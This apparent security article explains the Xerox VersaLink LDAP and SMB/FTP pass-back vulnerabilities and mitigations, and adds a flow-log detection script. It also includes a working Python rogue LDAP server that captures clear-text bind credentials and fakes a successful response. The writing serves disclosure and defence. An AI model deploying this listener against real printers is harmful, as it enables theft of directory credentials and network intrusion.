
Rapid7 has disclosed two vulnerabilities in Xerox VersaLink multifunction printers that let an attacker harvest the credentials the printer uses to talk to LDAP, SMB and FTP servers. The flaws affect firmware version 57.69.91 and earlier, and Xerox has released fixed firmware; organizations running these devices should update without delay.
Understanding the Vulnerabilities
The vulnerabilities, tracked as CVE-2024-12510 and CVE-2024-12511, enable so-called "pass-back" attacks. A pass-back attack does not break into the printer's credential store; it abuses the printer's own configuration so that the device connects outbound to a server the attacker controls and authenticates to it with the credentials it has stored. By changing the server addresses used for Lightweight Directory Access Protocol (LDAP) lookups and for Server Message Block (SMB) or File Transfer Protocol (FTP) scan destinations, the attacker makes the printer hand those credentials over.
LDAP and SMB/FTP Exploits
CVE-2024-12510 is the LDAP variant. An attacker with access to the printer's LDAP settings changes the configured LDAP server address to a host they control. The next time the printer performs an LDAP lookup (for example, an address-book search from the console), it binds to that host with its stored LDAP username and password, and because a simple bind sends the password unencrypted, the attacker's listener captures it in clear text. CVE-2024-12511 is the SMB/FTP variant: the attacker edits a scan-to-file destination in the printer's address book to point at their host, and the next scan to that entry makes the printer authenticate there. For FTP the username and password travel in clear text; for SMB the attacker obtains the NTLM challenge-response, which can be cracked offline.
- LDAP pass-back (CVE-2024-12510): repoint the LDAP server address so the printer's simple bind delivers its LDAP credentials in clear text to the attacker.
- SMB/FTP pass-back (CVE-2024-12511): repoint a scan-to-file address-book entry so the printer authenticates to a rogue server, leaking FTP credentials in clear text or an SMB NTLM challenge-response.
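To make the capture side of the LDAP pass-back concrete, here is an added example, written for this page and not taken from Rapid7's research or Xerox's code. It implements just enough of LDAPv3 BER to build a simple BindRequest (standing in for what the printer sends), run a rogue listener that harvests the DN and clear-text password from it and answers with a successful BindResponse so the client carries on, and exercises both over loopback. The service-account DN `cn=svc-printer,ou=Service,dc=corp,dc=example` and the password are invented sample values. The FTP variant is the same idea with a listener that records the `USER` and `PASS` lines instead.

```python
"""Rogue-LDAP credential capture (added example for the pass-back attack above).

Only the pieces of LDAPv3 BER needed for a simple bind are implemented.
The DN and password used in the demo are constructed sample values, not real accounts.
"""
import socket
import threading

def _ber_encode(tag: int, value: bytes) -> bytes:
    """Encode one TLV, using the long-form length when value is 128 bytes or more."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    length = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + value

def _ber_int(n: int) -> bytes:
    """Encode a non-negative INTEGER; a leading 0x00 stops a set high bit reading as negative."""
    raw = n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    return _ber_encode(0x02, raw if raw[0] < 0x80 else b"\x00" + raw)

def _ber_tlv(data: bytes, i: int):
    """Decode the TLV starting at data[i]; return (tag, value, index after it)."""
    tag, first = data[i], data[i + 1]
    if first < 0x80:
        return tag, data[i + 2:i + 2 + first], i + 2 + first
    n = first & 0x7F
    length = int.from_bytes(data[i + 2:i + 2 + n], "big")
    start = i + 2 + n
    return tag, data[start:start + length], start + length

def build_simple_bind(msg_id: int, dn: str, password: str) -> bytes:
    """LDAPMessage { messageID, [APPLICATION 0] BindRequest { version 3, dn, simple [0] password } }."""
    bind = _ber_int(3) + _ber_encode(0x04, dn.encode()) + _ber_encode(0x80, password.encode())
    return _ber_encode(0x30, _ber_int(msg_id) + _ber_encode(0x60, bind))

def build_bind_success(msg_id: int) -> bytes:
    """[APPLICATION 1] BindResponse with resultCode success(0) and empty matchedDN/diagnostic."""
    body = _ber_encode(0x0A, b"\x00") + _ber_encode(0x04, b"") + _ber_encode(0x04, b"")
    return _ber_encode(0x30, _ber_int(msg_id) + _ber_encode(0x61, body))

def parse_bind_request(data: bytes) -> dict:
    """Pull message id, DN and, for a simple bind, the clear-text password out of a BindRequest."""
    tag, msg, _ = _ber_tlv(data, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage")
    _, mid, i = _ber_tlv(msg, 0)
    tag, bind, _ = _ber_tlv(msg, i)
    if tag != 0x60:
        raise ValueError("not a BindRequest")
    _, version, i = _ber_tlv(bind, 0)
    _, dn, i = _ber_tlv(bind, i)
    auth_tag, auth, _ = _ber_tlv(bind, i)
    return {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(version, "big"),
        "dn": dn.decode(),
        # 0x80 is simple authentication: the secret itself is on the wire.
        # Anything else (0xA3 = SASL) does not expose a reusable password here.
        "password": auth.decode() if auth_tag == 0x80 else None,
    }

def rogue_ldap_once(listener: socket.socket) -> dict:
    """Accept one client on a listening socket, harvest its bind, and tell it the bind succeeded."""
    conn, peer = listener.accept()
    with conn:
        creds = parse_bind_request(conn.recv(4096))  # a bind request fits in one segment
        creds["peer"] = peer[0]
        conn.sendall(build_bind_success(creds["message_id"]))
    return creds

def demo_capture(dn: str, password: str) -> dict:
    """Loopback run: a stand-in for the printer binds to the rogue listener."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    captured = {}
    worker = threading.Thread(target=lambda: captured.update(rogue_ldap_once(listener)))
    worker.start()
    with socket.create_connection(listener.getsockname()) as printer:
        printer.sendall(build_simple_bind(1, dn, password))
        reply = printer.recv(4096)
    worker.join()
    listener.close()
    _, msg, _ = _ber_tlv(reply, 0)
    _, _, i = _ber_tlv(msg, 0)
    _, body, _ = _ber_tlv(msg, i)
    _, code, _ = _ber_tlv(body, 0)
    captured["bind_result"] = int.from_bytes(code, "big")  # 0: the "printer" thinks all is well
    return captured

if __name__ == "__main__":
    print(demo_capture("cn=svc-printer,ou=Service,dc=corp,dc=example", "Winter2025!"))
```

The listener answers "success" on purpose: a real pass-back works best when the printer sees nothing wrong and keeps using the repointed server. The `password` field is `None` for anything other than a simple bind, which is the check a defender cares about; a printer configured for SASL or for LDAP over TLS with certificate validation would not leak a reusable secret this way.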
Potential Impact and Exploitation
Neither flaw is exploitable by an unauthenticated remote attacker against a correctly locked-down device. The LDAP variant requires administrative access to the printer's configuration, through the web interface or at the physical console. The SMB/FTP variant only requires the ability to edit the address book, which can be done at the console or, if the device permits user-level rather than administrator-only changes to the address book, remotely through the web interface. The consequences are nonetheless serious: the captured credentials are typically Windows Active Directory accounts, and if the account used for LDAP lookups or scan-to-file is privileged, the attacker gains a foothold for lateral movement across the network.
Mitigation Strategies
Rapid7 reported both issues to Xerox under coordinated disclosure, and Xerox has released fixed firmware. Organizations should upgrade affected VersaLink devices to the current firmware without delay. Where patching must wait, reduce the blast radius: set strong, unique passwords for the printer's administrator account; configure LDAP and scan-to-file with a dedicated, least-privileged service account rather than a domain administrator account, so that a captured credential is worth little; disable remote console access for unauthenticated users; and restrict the printer's outbound LDAP, SMB and FTP traffic to the approved servers, so that a repointed configuration fails instead of leaking credentials.
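As an added example of the last point (mine, not from Rapid7 or Xerox): a pass-back in progress shows up on the network as a printer opening an LDAP, SMB or FTP connection to a host that is not one of its approved servers. The script below applies that rule to a handful of constructed flow-log lines in an assumed `src= dst= dport=` key-value format; the printer and server addresses are placeholders to replace with your own inventory.

```python
"""Flag printer LDAP/SMB/FTP connections that do not go to an approved server.

Added example; the log format, addresses and inventory below are constructed
placeholders, not Xerox or Rapid7 data.
"""
import re

# Inventory (assumed): which hosts are printers, and which server each service may use.
PRINTERS = {"10.10.20.15", "10.10.20.16"}
APPROVED = {389: {"10.10.1.5"}, 636: {"10.10.1.5"}, 445: {"10.10.1.20"}, 21: {"10.10.1.30"}}
SERVICE = {389: "LDAP", 636: "LDAPS", 445: "SMB", 21: "FTP"}

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")

def parse_flow(line: str):
    """Return (timestamp, src, dst, dport) or None if the line is not a flow record."""
    m = LINE.match(line)
    if not m:
        return None
    return m["ts"], m["src"], m["dst"], int(m["dport"])

def find_passback_candidates(lines):
    """Every printer flow on a watched port whose destination is not an approved server."""
    alerts = []
    for line in lines:
        rec = parse_flow(line)
        if rec is None:
            continue
        ts, src, dst, dport = rec
        if src in PRINTERS and dport in APPROVED and dst not in APPROVED[dport]:
            alerts.append({"ts": ts, "printer": src, "dst": dst, "service": SERVICE[dport]})
    return alerts

# Constructed sample log: two legitimate flows, two repointed ones, a non-printer
# host talking LDAP, and a printer flow on a port we do not watch.
SAMPLE_LOG = """\
2025-02-14T09:01:12Z src=10.10.20.15 dst=10.10.1.5 dport=389 proto=tcp
2025-02-14T09:02:40Z src=10.10.20.15 dst=10.10.20.77 dport=389 proto=tcp
2025-02-14T09:03:05Z src=10.10.20.16 dst=10.10.1.20 dport=445 proto=tcp
2025-02-14T09:03:30Z src=10.10.20.16 dst=10.10.20.77 dport=445 proto=tcp
2025-02-14T09:04:00Z src=10.10.30.8 dst=10.10.20.77 dport=389 proto=tcp
2025-02-14T09:05:00Z src=10.10.20.15 dst=10.10.1.40 dport=443 proto=tcp
""".splitlines()

if __name__ == "__main__":
    for a in find_passback_candidates(SAMPLE_LOG):
        print(f"{a['ts']} printer {a['printer']} sent {a['service']} to unapproved host {a['dst']}")
```

Run against the sample it reports the two flows to 10.10.20.77, one LDAP and one SMB, and nothing else. The same allow-list is what you would encode as an egress firewall rule for the printer VLAN; the detection is for the gap between "should not happen" and "cannot happen".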